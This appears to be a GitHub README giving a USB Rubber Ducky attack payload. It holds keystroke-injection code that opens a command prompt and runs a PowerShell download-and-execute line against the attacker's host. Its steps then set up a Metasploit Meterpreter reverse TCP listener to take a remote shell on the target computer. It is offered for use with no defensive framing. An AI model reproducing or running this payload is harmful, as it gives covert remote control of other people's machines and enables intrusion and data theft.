* Author - Ujjwal Thakran * When You insert the ducky it will run a Powershell download command from which you can use you Kali linux or If you have Metasploit properly installed than also you mac or other Linux Distros to create a meterpeter session with the target computer * Alternative to [Payload Reverse Shell](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---reverse-shell) 1. Encode your usb rubber Ducky with the Following ``` REM Replace the Site/IP address with you Kali linux IP Address DELAY 800 GUI r DELAY 800 STRING cmd DELAY 300 ENTER DELAY 300 STRING powershell IEX (New-Object Net.WebClient).DownloadString('(Site/IP address)/powershell.ps1') DELAY 300 ENTER ``` #### I suggest using [Ducky Encoder](https://ducktoolkit.com/encoder/) for this Payload 2. Create a PowerShell Meterpreter reverse TCP payload and Place it on your Host Computer #### Use This to create the Payload [Powershell Payload generator](https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky)) Here is the Powershell Payload I generated for My IP #### [Payload Link](https://pastebin.com/c7xrRCY9) 3. Fire up MSFCONSOLE and start the listener: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST (Your IP) set LPORT (Your PORT #) run ``` 4. Insert the USB rubber ducky in and wait for the magic to happen ##### And Thats It folks You can run custom ``` Shell ``` #### After that * ###### Contact Me on Github or Email me at (ujjwalthakran@hotmail.com) For Edit or help Thanks